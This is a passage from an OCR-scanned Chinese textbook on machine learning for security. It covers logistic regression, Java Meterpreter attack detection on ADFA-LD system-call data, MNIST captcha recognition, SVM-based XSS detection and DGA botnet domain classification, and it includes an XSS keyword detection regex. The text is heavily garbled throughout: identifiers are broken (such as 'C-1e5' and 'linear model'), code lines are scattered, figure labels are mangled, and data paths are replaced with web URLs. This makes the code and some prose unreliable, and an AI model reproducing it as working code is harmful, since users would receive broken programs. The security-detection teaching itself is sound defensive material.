逻辑 回归 是 当前 业界 比较 常用 的 机 器 学 习 方 法 ， 用 于 估计 某 种 事物 的 可 能 性 ， 比 如 广告 的 点 击 预测 ， 茶 用 户 购买 某 商品 的 可 能 性 ， 某 病人 患 有 茶 种 疾病 的 可 能 性 ， 等 等 。 逻 辑 回 归 可 以 用 来 回归 ， 也 可 
以 用 来 分 类 。 本 章 首先 结合 广告 预测 的 例子 来 介绍 逻辑 回归 的 基本 概念 ， 并 给 出 基本 的 使 用 方式 ， 然 后 介绍 如 何 使 用 逻辑 回归 来 检测 基于 Java 的 溢出 攻击 ， 最 后 介绍 如 何 使 用 逻辑 回归 来 识别 基于 MNIST 数 据 


集 的 验证 码 。 


8.1 逻辑 回 AS 算法 概述 


在 我 们 打开 浏览 器 访问 网 页 的 时 候 ， 时 常会 在 网 页 的 边 角 位 置 看 到 一 些 似 曾 相识 的 广告 ， 似 乎 和 最 近 关注 的 话题 和 浏览 的 内 容 有 关 。 这 其 实 就 是 逻辑 回归 的 一 种 应 用 ， 广 告 服务 商 自 动 根 据 你 的 历史 浏 
览 内 容 、 关 注 话题 等 数据 ， 预 测 你 点 击 那 一 类 广告 的 概率 会 更 大 ， 从 而 选择 适当 的 广告 素材 展现 在 你 面前 ， 如 图 8-1 所 示 。 

逻辑 回归 也 叫 回归 分 析 ， 是 分 类 和 预测 算法 中 的 一 种 。 逻 辑 回 归 通 过 历史 数据 的 表现 对 未 来 结果 发 生 的 概率 进行 预测 。 回 归 分 析 用 来 摘 述 自 变 量 X 和 因 变 量 Y 之 间 的 关系， 或 者 说 自 变量 X 对 因 变 量 Y 的 影 
响 程度 ， 并 对 因 变 量 Y 进 行 预测 。 其 中 因 变 量 是 我 们 希望 获得 的 结果 ， 自 变量 是 影响 结果 的 潜在 因素 ， 自 变量 可 以 有 一 个 ， 也 可 以 有 多 个 。 只 含 一 个 自 变 量 的 回归 分 析 叫 做 一 元 回归 分 析 ， 超 过 一 个 自 变量 的 
回归 分 析 叫 做 多 元 回归 分 析 。 


逻辑 回归 
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图 8-1 逻辑 回归 在 广告 领域 的 应 用 举例 


8.2 示例 : hello world! 逻辑 回归 


我 们 先 演示 逻辑 回归 的 基本 使 用 (如 图 8-2 所 示 ) ， 完 整 演示 代码 请 见 本 书 GitHub 上 的 8-1.py。 逻 辑 回归 的 核心 函数 为 : 

















LogisticRegression (penalty='12', dual-False, tol-0.0001, C-1.0, fit intercept-True, intercept scaling-1, class weight-None, random state-None, solver-'liblinear', max iter-100, 


Sepal width 





Sepal length 


图 8-2 ”逻辑 回归 使 用 举例 


其 中 比较 重要 的 参数 有 以 下 4 个 。 

: random state: 随机 种 子 。 

: C: 正则 化 系数 ， 越 小 正则 化 程度 越 高 。 

- Solver: 算法 ， 包 括 “newton-cg” ‘Ibfgs’ ‘liblinear” “sag”， 上 默认 使 用 ‘liblinear”。 
n jobs: 并 发 任务 数 。 


加 载 相关 库 文件 : 


import numpy as np 
import matplotlib.pyplot as plt 
from sklearn import linear model, datasets 








使 用 经 典 的 iris 数 据 集合 : 


iris = datasets.load iris() 
X — iris.data[:, :2] 
Y iris.target 





使 用 逻辑 回归 训练 并 预测 : 








logreg = linear model.LogisticRegression (C-1e5) 
logreg.fit(X, Y) 














x min, x max = X[:, 0] .min() - .5, X[:, 0] .max() + .5 

y min, y max = X[:, 1].min() - .5, X[:, 1].max() + .5 

XX, yy = np.meshgrid(np.arange(x min, x max, h), np.arange(y min, y max, h)) 
] 





将 结果 可 视 化 : 


Z.reshape (xx.shape) 

.figure(1, figsize-(4, 3)) 

.pcolormesh (xx, yy, Z, cmap=plt.cm. Paired) 

.Scatter(X[:, 0], X[:, 1], c=Y, edgecolors-'k', cmap=plt.cm. Paired) 
































Zc-— 

plt 

plt 

plt 

plt.xlabel('Sepal length') 
pit.ylabel('Sepal width') 
pit.xlim(xx.min(), xx.max()) 
pit.ylim(yy.min(), yy.max()) 
pit.xticks (()) 

pit.yticks (()) 

plt.show () 


8.3 示例 : 使 用 逻辑 回归 算法 检测 Java 溢 出 攻击 


完整 演示 代码 请 见 本 书 GitHub 上 的 8-2.py。 


1 .数据 搜集 和 数据 清洗 


使 用 ADFA-LD 数 据 集中 java 溢出 攻击 的 相关 数据 ( 见 图 8-3) ，ADFA-LD 数 据 集 详 细 介绍 请 阅读 第 3 章 相 关内 容 。 





HIDS 记录 下 系统 调用 序列 


加 载 ADFA-LD 中 的 正常 样本 数据 : 











def load adfa training files (rootdir): 


x-[] 
y=[] 
list = os.listdir 


(rootdir) 





£ 


for i in range (0, 





len(list)): 


path = os.path.join(rootdir, list[i]) 
if os.path.isfile (path): 





x.append (load one flle (path)) 
y.append (0) 


return X,y 





n] tg 4t n] tg 4t 





图 8-3 ADFA-LD 系 统 调用 抽象 成 向 量 


定义 遍历 目录 下 文件 的 函数 : 








def dirlist(path, allfile): 
filelist = os.listdir (path) 
for filename in filelist: 
Filepath = os.path.join(path, filename) 
if os.path.isdir(filepath) : 

dirlist (filepath, allfile) 

else: 
allfile.append (filepath) 
return allfile 



















































































从 攻击 数据 集中 筛选 和 Java 溢 出 攻击 相关 的 数据 : 

















def load adfa java files (rootdir): 




















x-[] 
y=[] 
allfile-dirlist (rootdir, []) 
for file in allfile: 
if re.match ( 























r" http: //www.hzcourse.com/resource/readBook?path=/openresources/teach_ ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/Java Meterpreter \d+/UAD-Java-Mete 
file): 














x.append (load one flle (file) ) 
y.append (1 
return X,y 








~ 一 





2. 特 征 化 


由 于 ADFA-LD 数 据 集 都 记录 函数 调用 序列 ， 每 个 文件 包含 的 浮 数 调用 序列 的 个 数 都 不 一 致 ， 可 以 参考 第 3 章 中 的 词 集 模型 进行 特征 化 : 








X1l,yl-load adfa training files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Training Data Master/") 
x2, y2=load adfa hydra ftp files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/" 
xX-xltx2 
y-ylty2 
vectorizer - CountVectorizer (min df-1) 
x-vectorizer.fit transform (x) B 
x-x.toarray() 










































































3. 训 





练 样本 


实例 化 逻辑 回归 算法 ， 正 则 系数 为 1e5: 


logreg = linear model.LogisticRegression (C=1e5) 





4. 效 果 验 证 


我 们 使 用 十 折 交 叉 验 证 : 


print cross validation.cross val score(logreg, x, y, n jobs--1,cv-10) 





测试 结果 如 下 ， 准 确 率 93% 左 右 : 


0.930928852415 





8.4 示例 : 识别 验证 人 码 


上 一 章 提 过 ，MNIST 是 一 个 入 门 级 的 计算 机 视觉 数据 集 ， 包 含 各 种 手写 数字 图 片 ， 也 包含 每 一 张 图 片 对 应 的 标签 ， 告 诉 我 们 这 个 是 数字 几 。 我 们 使 用 逻辑 回归 来 识别 由 M NIST 组 成 的 验证 码 。 完 整 演示 
代码 请 见 本 书 GitHub 上 的 8-3.py。 


1 .数据 搜集 和 数据 清 


使 用 MNIST 离 线 版 的 数据 ， 具 体 下 载 地 址 以 及 数据 集 的 介绍 请 参考 第 3 章 相 关内 容 : 





def load data(): 
with gzip.open('http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/MNIST/mnist.pkl.gz') as fp: 

training data, valid data, test data - pickle.load(fp) 

return training data, valid data, test data 





















































2. 特 征 化 


MNIST 已 经 将 24x24 的 图 片 特征 化 成 长 度 为 784 的 一 维 向 量 。 








3. 训 练 模型 
使 用 逻辑 回归 训练 : 








training data, valid data, test data-load data() 
xl,yl-training data Bi i 
x2,y2=test data 
logreg = linear model.LogisticRegression (C=le5) 
logreg.fit(x1, yl) 



































4 效果 验 证 


验证 效果 : 





print cross validation.cross val score(logreg, x2, y2, scoring-"accuracy") 





准确 率 80% 左 右 ， 效 果 还 不 错 ， 但 是 离 可 以 实际 使 用 还 是 有 距离 : 


[ 0.76423008 0.85238524 0.86272154] 


85 ”本 童 小 结 


本 章 重 点 介绍 逻辑 回归 的 基础 知识 及 其 在 Web 安 全 领域 的 相关 应 用 。 回 归 类 问题 在 安全 领域 应 用 较 少 ， 本 章 主要 介绍 逻辑 回归 的 基本 使 用 ， 以 及 基于 分 类 问题 的 使 用 案例 。 
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我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进 一 步 学 习 ， 欢 迎 到 该 网 站 进 一 : SD http://www.mamicode.com/info-detail-501714.html。 


还 有 一 些 参考 文献 值得 一 读 : 


= 
— 


] GCreech, J Hu.A Semantic Approach to Host-based Intrusion Detection Systems Using Contiguous and Discontiguous System Call Patterns.Computers, IEEE Transactions, 2013. 
[2] MXie, J Hu, J Slay.Evaluating Host-Based Anomaly Detection Systems: Application of the One-Class SVM Algorithm to ADFA-LD[M].Springer International Publishing, 2014. 
[3] AK Ghosh, A Schwartzbard, M Schatz.Learning Program Behavior Profiles for Intrusion Detection. Workshop on Intrusion Detection and Network Monitoring, vol.51462, 1999. 
[4] G Creech, J Hu.A Semantic Approach to Host-Based Intrusion Detection Systems Using Contiguous and Discontiguous System Call Patterns.Computers, IEEE Transactions, 2013. 
[5] Y Liao, V R Vemuri.Use of K-Nearest Neighbor Classifier for Intrusion Detection. Computers&Secutity, 2002. 


[6] M Xie, J Hu.Evaluating Host-Based Anomaly Detection Systems: A Preliminary Analysis of Adfa-ld.International Congress on Image&Signal Processing, 2013, 03: 1711-1716. 


第 9 草 ”支持 向 量 机 算法 


支持 向 量 机 是 分 类 算法 里 面 使 用 范围 最 为 广泛 的 算法 之 一 ， 甚 至 可 以 自豪 地 说 没有 之 一 ， 它 广泛 地 应 用 在 生活 中 的 众多 领域 ， 基 本 上 所 有 的 分 类 问题 ， 尤 其 是 二 分 类 问题 ， 都 可 以 先 用 它 试 下 ， 众 多 机 
器 学 习 的 教材 都 把 支持 向 量 机 作为 第 一 个 算法 来 介绍 ， 可 见 其 重要 地 位 。 本 章 将 介绍 支持 向 量 机 的 基本 概念 ， 并 给 出 基本 的 使 用 方式 。 然 后 介绍 如 何 使 用 支持 向 量 机 来 检测 XSS， 以 及 区 分 僵尸 网 络 的 DGA 


9.1 ”支持 向量 机 算法 概述 


www.reddit.com 上 面 有 个 非常 有 趣 的 帖子 ，Lvhhh 用 白话文 解释 了 支持 向 量 机 算法 ， 非 常 形象 ， 下 面 摘录 一 下 。 


RA, MER (RE) AR ORE) 于 一 桌 欲 分 之 ， 见 图 9-1。 





图 9-1 红 蓝 球 故事 1 


插 一 筷子 于 监 红 球 之 间 则 蓝 红 球 可 分 ， 见 图 9-2。 





图 9-2” 红 蓝 球 故事 2 


未 料 ， 随 着 球 之 增多 ， 一 红 球 出 界 毁 吾 之 分 害 ， 见 图 9-3。 可 惜 可 气 。 





图 9-3” 红 蓝 球 故事 3 


不 服 ， 遂 变化 筷子 方向 则 又 可 分 红 蓝 球 也 ， 见 图 9-4。 





图 9-4 KRKE, 


终 有 体会 ， 欲 合理 分 清 红 蓝 之 球 ， 必 使 得 近 处 红 蓝 球 于 筷子 越 远 越 好 。 


他 日 ， 又 偶遇 众 红 蓝 球 ， 见 图 9-5， 吾 又 欲 分 之 。 





图 9-5” 红 蓝 球 故事 5 


拿 策 子 比划 半天 无 从 分 离 ， 百 思 不 得 其 解 。 遂 大 她， 猛 一 拍 桌 。 


见 桌 上 之 球 于 空中 仿佛 有 可 分 之 势 ， 蓝 上 红 下 。 大 喜 ， 顺 势 抽 一 张 纸 隔 于 监 红 球 之 间 ， 则 蓝 红 之 球 可 分 也 ， 见 图 9-6。 





Input Space Feature Space 
图 9-6” 红 蓝 球 故事 6 
遂 可 得 : 若 于 桌面 上 不 可 分 (二 维 ) ， 则 拍 桌 ， 将 球 腾空 而 起 (三维) ， 则 可 分 之 。 


支持 向 量 机 (Support Vector Machine, SVM) 是 机 器 学 习 领 域 使 用 最 广泛 的 算法 之 一 ， 其 原理 如 图 9-7 所 示 ， 通 常用 来 进行 模式 识别 、 分 类 以 及 回归 分 析 ， 它 特别 适合 安全 世界 里 面 的 非 黑 即 白 ， 所 
以 我 们 重点 介绍 与 分 类 相关 的 知识 。 





特征 A 


图 9-7 ”SVM 原理 图 


假设 只 有 二 维 的 特征 向 量 ， 我 们 需要 解决 一 个 分 类 问题 ， 需 要 通过 将 正常 用 户 和 黑客 区 分 开 来 ， 如 果 确 实 可 以 通过 一 条 直线 区 分 ， 那 么 这 个 问题 成 为 可 以 线性 可 区 分 (linear separable) ， 如 果 不 行 则 
成 为 不 可 线性 区 分 (linear inseparable) 。 讨 论 最 简单 的 情况 ， 假 设 这 个 分 类 问题 是 可 以 线性 区 分 的 ， 那 么 这 个 区 分 的 直线 成 为 超 平面 ， 距 离 超 平面 最 近 的 样本 成 为 支持 向 量 (Supprot Verctor) 。 


特征 B 


特征 B 


正常 用 户 à. 





特征 A 





特征 A 


d 
图 9-8 SVM 从 二 维 平面 升级 到 三 维 平面 


如 图 9-8 所 示 ， 对 于 不 可 线性 区 分 的 情况 ， 需 要 升级 到 更 高 的 平面 进行 区 分 ， 比 如 二 维 平面 搞 不 定 就 需要 升级 到 三 维 平面 来 区 分 ， 这 个 升级 就 需要 依靠 核 函 数 。SVM 通 过 一 个 非 线性 映射 ， 把 样本 空间 
映射 到 一 个 高 维 乃 至 无 穷 维 的 特征 空间 中 (Hilbert 空 间 ) ， 使 得 在 原来 的 样本 空间 中 非 线 性 可 分 问题 转化 为 在 特征 空间 中 的 线性 可 分 问题 。 简 单 地 说 ， 就 是 升 维和 线性 化 。 升 维 ， 就 是 把 样本 向 高 维 空间 做 
映射 ， 一 般 情 况 下 这 会 增加 计算 的 复杂 性 ， 甚 至 会 引起 “ 维 数 灾难 ”， 因 而 人 们 很 少 问津 。 但 是 作为 分 类 、 回 归 等 问题 ， 很 可 能 在 低 维 样本 空间 无 法 线性 处 理 的 样本 集 ， 在 高 维特 征 空间 中 却 可 以 通过 一 个 
线性 超 平面 实现 线性 划分 (或 回归 ) 。 一 般 的 升 维 都 会 带 来 计算 的 复杂 化 ，SVM 方 法 巧妙 地 解决 了 这 个 难题 : 应 用 核 函数 的 展开 定理 ， 就 不 需要 知道 非 线 性 映射 的 显 式 表达 式 ; 由 于 是 在 高 维特 征 空间 中 建 
立 线性 学 习 机 ， 所 以 与 线性 模型 相 比 ， 不 但 几乎 不 增加 计算 的 复杂 性 ,而且 在 某 种 程度 上 避免 了 “ 维 数 灾 难 ”。 这 一 切 要 归功 于 核 函 数 的 展开 和 计算 理论 。 


选择 不 同 的 核 函 数 ， 可 以 生成 不 同 的 SVM ， 常 用 的 核 阔 数 有 以 下 四 种 : 
线性 核 函 数 多 (x, y) =x + yo 
多项式 核 函数 KE (x, y) =[ (x y) +1]^d。 


-BARRAK (x, y) =exp (-|x-y|^2/d^2) 。 


- 二 层 神 经 网 络 核 函 数 K (x, y) =tanh (a (x-y) +b) 。 


9.2 Fi: hello world! 支持 向 量 机 


我 们 先 演示 支持 向 量 机 的 基础 使 用 ， 完 整 演 示 代 码 请 见 本 书 GitHub 上 的 9-1.py。 


导入 库 文件 : 


print( doc ) 

import numpy as np 

import matplotlib.pyplot as plt 
from sklearn import svm 














创建 40 个 随机 点 : 


np.random. seed (0) 





























X = np.r [np.random.randn(20, 2) - [2, 2], np.random.randn(20, 2) + [2, 2]] 
Y= [0] * 20 + [1] * 20 

# fit the model 

clf = svm.SVC (kernel='linear') 

clf.fit(X, Y) 

构造 超 平面 : 








w — clf.coef [0] 
a = -w[0] / w[1] 























xx = np.linspace(-5, 5) 
yy =a * xx - (clf.intercept [0]) / w[1] 
# plot the parallels to the separating hyperplane that pass through the 


# support vectors 

b = clf.support vectors [0] 
yy down = a * xx + (b[1] - a * b[0]) 
b = clf.support vectors [-1] 

Xy Up = a * xx + (b[1] - a * b[0]) 





























调用 matplotlib 画 图 : 



























































plt.plot(xx, yy, 'k-') 

plt.plot(xx, yy down, 'k--') 

plt.plot(xx, yy up, 'k--') 

plt.scatter(clf.support vectors [:, 0], clf.support vectors [:, 1], 
s=80, facecolors-'none') 

pit.scatter(X[:, 0], X[:, 1], c=Y, cmap=plt.cm. Paired) 

pit.axis('tight') 

plt.show () 

运行 代码 : 


localhost:code maidou$ python 9-1.py 
None 
localhost:code maidou$ 

















SVM hello word 代 码 如 图 9-9 所 示 。 





-4 z^ 0 2 4 


图 9-9 SVM hello word4X, 25 


9.3 示例 : 使 用 支持 向 量 机 算法 识别 XSS 


下 面 以 常见 的 XSS 检 测 来 说 明 下 SVM 的 简单 应 用 。 完 整 演示 代码 请 见 本 书 CitHub 上 的 9-2.py。 
1. 处 理 流程 


数据 处 理 流程 如 图 9-10 所 示 。 


数据 标记 


特征 化 


ZU FAT 


训练 数据 测试 数据 


异型 训练 > 验证 模型 





图 9-10 ”数据 处 理 流 程 


2. 数 据 搜集 和 数据 清洗 


由 于 我 们 的 例子 比较 简单 ， 把 上 述 两 个 步骤 合并 即 可 ， 准 备 数量 相等 的 正常 Web 访 问 日 志和 XSS 攻 击 的 Web 日 志 ， 最 简单 的 方法 是 参考 我 以 前 的 文章 《基于 WAVSEP 的 靶场 搭建 指南 》， 使 用 WVS 等 扫 
描 器 仅 扫 描 XSS 相 关 漏 洞 即 可 获取 XSS 攻 击 的 Web 日 志 。 


3. 特 征 化 


实践 中 数据 搜集 & 数 据 清洗 是 最 费时 间 的 ， 特 征 化 是 最 烧 脑 的 ， 因 为 世界 万 物 是 非常 复杂 的 ， 具 有 很 多 属性 ， 然 而 机 器 学 习 通 常 只 能 理解 数字 向 量 ， 这 个 从 现实 世界 的 物体 转变 成 计算 世界 的 数字 的 过 
程 就 是 特征 化 ， 也 叫 向 量化 。 比 如 要 你 特征 化 你 前 女友 ， 你 总 不 能 说 漂亮 、 温 柔 这 些 词 ， 需 要 对 最 能 代表 她 的 特点 的 方面 进行 数字 化 ， 如 图 9-11 所 示 。 


月 消费 能 力 : 10000 - 





图 9-11 现实 生活 中 将 事物 向 量化 的 例子 


你 会 发 现 各 个 向 量 之 间 的 数据 范围 差别 很 大 ， 一 个 月 消费 能 力 可 能 就 干掉 其 他 特征 对 结果 的 影响 了 ， 虽 然 现实 生活 中 这 个 指标 确实 影响 很 大 ， 但 是 不 足以 干掉 其 他 全 部 特征 ， 所 以 我 们 还 需要 对 特征 进 
行 标准 化 ， 常 见 的 方式 为 : 


- 标准 化 ; 


ISA EY; 


` 去 均值 。 


回 到 XSs 的 问题 上 ， 我 们 需要 针对 Web 日 志 进 行 特征 化 ， 如 图 9-12 所 示 。 





特征 


提取 的 示例 代码 如 下 : 





def get len(url): 





return len (url) 














def get url count (url): 


图 9-12 Web 日 志 特 征 举例 






























































if re.search(' (http://)| (https://)', url, re.IGNORECASE) : 
return 1 
else: 
return 0 
def get evil char (url): 
return len(re.findall("[«»5,V'V"/]", url, re.IGNORECASE)) 
def get evil word(url): 
return len (re.findall(" (alert) | (Script=) (%3c) | ($3e) | ($20) | (onerror) | (onload) | (eval) | (src=) | (prompt) ",url,re.IGNORECASE)) 




















数据 标准 化 使 用 如 下 代码 即 可 : 

















min max scaler = preprocessing.MinMaxScaler () 
x min max=min max scaler.fit transform(x) 

















4 数据 打 标 


XSS 标 记 为 1， 正 常 访问 标记 为 0。 


5. 数 据 拆 分 


这 一 步 是 为 了 随机 把 数据 区 分 成 训 | 练 组 和 测试 组 ， 通 常 直接 使 用 cross_validation.train_test_split 即 可 ， 通 常 40% 作 为 测试 样本 ，60% 作 为 训练 样本 ， 这 个 比例 可 以 根据 自己 的 需要 进行 调节 : 





X train, x test, y train, y test = cross validation.train test split(x,y, test size-0.4, random state=0) 





6 .数据 训练 


使 用 Scikit-Learn 的 SVM 模型 即 可 ，SVM 用 于 分 类 的 模型 称 为 SVC， 我 们 使 用 最 简单 的 核 国 数 linear: 





clf = svm.SVC(kernel-'linear', C-1).fit(x, y) 
joblib.dump (clf,"xss-svm-200000-module.m") 














7. 模 型 验证 


通过 加 载 训练 后 的 模型 ， 针 对 测试 集合 进行 预测 ， 将 预测 结果 与 打 标 结果 进行 比 对 ; 


clf-j 





oblib.load("xss-svm-200000-module.m") 





y tes 
y tes 
print 











t=clf.predict (x) 
metrics.accuracy score(y test, y) 


在 测试 环节 中 ， 我 们 在 一 个 各 有 20 万 个 样本 的 黑白 模型 上 进行 训练 ， 在 一 个 各 有 :5 万 个 样本 的 黑白 测试 集 上 进行 校 验 ， 任 何 黑白 预测 错 都 判断 为 错误 ， 最 后 运行 结果 准确 率 为 80%， 对 于 机 器 学 习 而 
言 ， 仪 依靠 模型 优化 ， 这 个 比例 已 经 很 高 了 。 通 过 在 更 大 的 数据 集合 
提高 这 个 比例 ， 最 后 我 们 做 到 了 准确 率 90% 以 上 。 图 9-13 是 特征 扩展 的 举例 ， 大 家 可 以 根据 实际 情况 增加 个 数 。 


进行 训练 (比如 大 型 CDN& 云 WAF 集 群 的 日 志 ) ， 进 一 步 增 加 特征 个 数 以 及 增加 后 面 环节 的 自动 化 或 者 半自动 化 的 验证 ， 可 以 进一步 
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图 9-13 Web 日 志 特 征 


8. 异 常数 据 


还 有 不 少 其 他 攻击 行为 ， 由 于 测试 时 只 打开 了 XSS 的 规则 签名 ， 所 以 其 他 攻击 行为 没有 拦截 ， 也 进入 了 白 样 本 ， 举 例如 下 : 


通过 SVM 我 们 识别 出 了 异常 数据 ， 经 过 人 工 确 认 ， 除 了 变形 的 XSS 以 外 ， 
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从 广义 上 讲 ，Xss 和 SQL 注入 都 是 属于 代码 注入 导致 的 漏洞 。 我 们 推测 由 于 训练 样本 中 混入 了 SQL 注入 的 样本 ， 所 以 导致 训练 结果 中 也 出 现 了 了 SQL 注入 


9.4 示例 : 使 用 支持 向 量 机 算法 区 分 僵尸 网 络 DGA 家 族 


僵尸 网 络 为 了 躲避 域名 黑 名 单 ， 通 常会 使 用 DGA 技 术 动态 生成 域名 ， 通 过 DGA 域 名 的 不 同 特征 ， 可 以 尝试 识别 不 同 的 家 族群 。 我 们 以 常见 的 cryptolocker 和 post-tovar-goz 两 个 僵尸 网 络 家 族 为 例 ， 


整 演示 代码 请 见 本 书 GitHub 上 的 9-3.py。 


9.4.1 “数据 搜集 和 数据 清 污 


实验 阶段 ， 我 们 搜集 了 如 下 数据 : 
. 1000 个 cryptolocket 域 名 ; 

- 1000 个 post-tovar-goz 域 名 ; 

- alexa 前 1000 域 名 。 


DGA 文 件 格 式 如 下 : 








xsxqeadsbgvpdke.co.uk,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.txt 








从 DGA 文 件 中 提取 域名 数据 : 





de 








f load dga (filename): 

domain list-[] 

#xsxqeadsbgvpdke.co.uk,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13, 

4 http://osint.bambenekconsulting.com/manual/cl.txt 

with open(filename) as f: 
for line in f: 
domain-line.split(", 
if domain >= MIN LEN: 

domain list.append (domain) 

domain list 


























) [0] 























return 


alexa 文 件 使 用 CSV 格 式 保存 域名 的 排名 和 域名 ， 提 取 数 据 方式 如 下 : 


de 











f load alexa (filename): 
domain list-[] 
csv reader csv. reader (open (filename) ) 
for row in csv reader: 
domain=row[1] 
if domain >= MIN LEN: 
domain list.append (domain) 
return domain list 























94.2 ”特征 化 


1. 元 音字 母 个 数 


i 五 圭 


eae, 


正常 人 通常 在 取 域 名 的 时 候 ， 都 会 偏向 选取 “好 读 ” 的 几 个 字母 组 合 ， 抽 象 成 数学 可 以 理解 的 
母 这 方面 的 特征 不 明显 。 下 面 我 们 通过 数据 分 析 来 验证 我 们 的 想法 。 


这 使 英文 的 元 音字 母 比例 会 比较 高 。DGA 生 成 域名 的 时 候 ， 由 于 时 间 因 素 是 随机 因素 ， 所 以 元 音字 


读 取 alexa 域 名 数据 : 





= 


xl domain list = load alexa ("http://www.hzcourse.com/resource/readBook?path=/openresources/teach_ ebook/uncompressed/16472/OEBPS/Text/../data/top-1000.csv") 


























计算 元 音字 母 的 比例 : 





de 





f get aeiou(domain list): 
x-[] 
y-[] 
for domain in domain list: 
x.append (len (domain) ) 
count-len (re. findall (r' [aeiou]',domain. lower ())) 
count=(0.0+count) /len (domain) 
y.append (count) 
return X,y 




















分 别 获取 两 个 僵尸 网 络 DGA 域 名 数据 以 及 alexa 域 名 数据 ， 并 计算 元 音字 母 比例 : 





= 






















































































xl domain list = load alexa ("http://www.hzcourse.com/resource/readBook?path=/openresources/teach_ ebook/uncompressed/16472/OEBPS/Text/../data/top-1000.csv") 

x l,y l-get aeiou(xl domain list) 

X2 domain list = load dga ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/dga-cryptolocke-1000.txt") 

x 2,y 2-get aeiou(x2 domain list) 

X3 domain list = load dga ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/O0EBPS/Text/../data/dga-post-tovar-goz-1000.txt") 
x 3,y 3-get aeiou(x3 domain list) 














以 域名 长 度 为 横 轴 ， 


元 音字 母 比 例 为 纵 轴 作 图 : 




































































fig, ax=plt.subplots () 
ax.set xlabel ('Domain Length") 
ax.set ylabel ('AEIOU Score") 
ax.scatter (x 3,y 3,color-'b',label-"dga post-tovar-goz",marker-'o') 
ax.scatter(x 2, y 2, color-'g', label-"dga cryptolock",marker-'v') 
ax.Scatter (x 1 " y 1 , Color-'r', label-"alexa",marker-'*') 
ax.legend(loc-'best') 
plt.show () 

FBR A 


分 析 图 9-14， 不 同 家 族 之 间 有 具有 了 明 


M2R A 


效果 ， 正 常 域名 与 DGA 之 间 具 有 一 定 的 区 分 性 。 


AEIOU Score 


07 


2. 去 重 后 的 字母 数字 个 数 与 域名 长 度 的 比例 


去 重 后 的 字母 数字 个 数 指 的 是 域名 中 去 掉 重 复 的 字母 和 数字 后 的 个 数 ， 比 如 : 


baidu 的 个 数 为 5; 
: facebook ^ Jk 737 ; 


: google 4 4-3 734. 


15 


* * è dga post-tovar-goz 


* * v dga cryptolock 


* * « alexa 
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Domain Length 


图 9-14 元 音字 母 比例 分 布 图 
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去 重 后 的 字母 数字 个 数 与 域名 长 度 的 比例 ， 从 某 种 程度 上 反映 了 域名 字符 组 成 的 统计 特征 。 计 算 去 重 后 的 字母 数字 个 数 可 以 使 用 python 的 set 数 据 结构 : 


30 33 





def 





x-[] 
y=[] 





return x,y 


get uniq char num (domain list): 


for domain in domain list: 


x.append (len (domain) ) 
count-len (set (domain) ) 

count= (0.0+count) /len (domain) 
y.append (count) 





分 别 获取 两 个 僵尸 网 络 DGA 域 名 数据 以 及 alexa 域 名 数据 ， 并 计算 去 重 后 的 字母 数字 个 数 与 域名 长 度 的 比例 : 








xl domain list 
x l,y l=ge 





x 2,y 2-gel 





t uniq char num 








List) 


oad dga ("http: //www.hzcourse.com/resource/readBook?pa! 


X2 domain 





x3 domain . 
x 3,y 3-ge 





ist 














t uniq c 
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th-/openresources/| 
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(x2 | E 

oad dga ("http: / /www .hzcourse.com/resource/readBook?pal 
har num(x3 domain 1] 


List) 


th=/openresources/ 





teach ebook/uncompressed/1 


teach ebook/uncompressed/1 


load alexa ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/0 
t uniq char num(xl domain 1 
x2 domain list ] 


16472/0 





EBPS/Text 








16472/0 


t/../dat 











EBPS/Text 





EBPS/Text/../data/top-1000.csv") 


ta/dga-cryptolocke-1000.txt") 





t/../dat 


ta/dga-post-tovar-goz-1000.txt") 





以 域名 长 度 为 横 轴 ， 去 重 后 的 字母 数字 占 域名 长 度 的 比例 为 纵 轴 作 图 ， 结 果 如 图 9-15 所 示 。 


UNIQ CHAR NUMBER 
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e®e dga post-tovar-goz 
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图 9-15 ”唯一 字母 数字 比例 分 布 图 


分 析 图 9-15， 不 同 家 族 之 间 具 有 了 明显 聚合 效果 ， 正 常 域名 与 DGA 之 间 具 有 一 定 的 区 分 性 。 


3. 平 均 jarccard 系 数 


ASN 
集合 交 


jarccard 系 数 定义 为 两 个 


计算 两 个 域名 之 间 的 jarccard 系 数 的 方法 为 : 


集 与 并 集 元 素 个 数 的 比值 ， 本 例 的 jarccard 系 数 是 基于 2-gram 计 算 的 。 
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30 3D 














def count2string jarccard index (a,b): 
x-set(' '+a[0]) 
y=set(' '+b[0]) 








for i in range(0,len(a)-1): 
x.add(a[i]*a[i-41]) 
x.add(a[len(a)-1]-*' ') 





for i in range (0, len ( 

y.add (b[i]+b[i+1] 
y.add(b[len(b)-1]+' ' 
return (0.0+len(x-y) ) /len(x|y) 


b)-1): 
) 
) 


计算 两 个 域名 集合 的 平均 jarccard 系 数 的 方法 为 : 


def 





get jarccard index(a list,b list): 

x=[] 

y=[] 

for a in a list: 
JOO ^ 

for b in b list: 
j+=count2string jarccard index (a,b) 
x.append (len (a) ) 
y.append(j/len(b list)) 

return x,y 7 




















分 别 获 取 两 个 僵尸 网 络 DGA 域 名 数据 以 及 alexa 域 名 数据 ， 并 计算 jarccard 系 数 比例 : 














































































































BPS/Text/../data/top-1000.csv") 


ta/dga-cryptolocke-1000.txt") 





xl domain list = load alexa ("http://www.hzcourse.com/resource/readBook?path=/openresources/teach_ebook/uncompressed/16472/0E! 

x l,y l=get jarccard index(xl domain list,x1 domain list) 

x2 domain list = load dga("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../da 
x 2,y 2-get jarccard index(x2 domain list,xl domain list) 

x3 domain list = load dga ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../da 
x 3,y 3-get jarccard index(x3 domain list,xl domain list) 

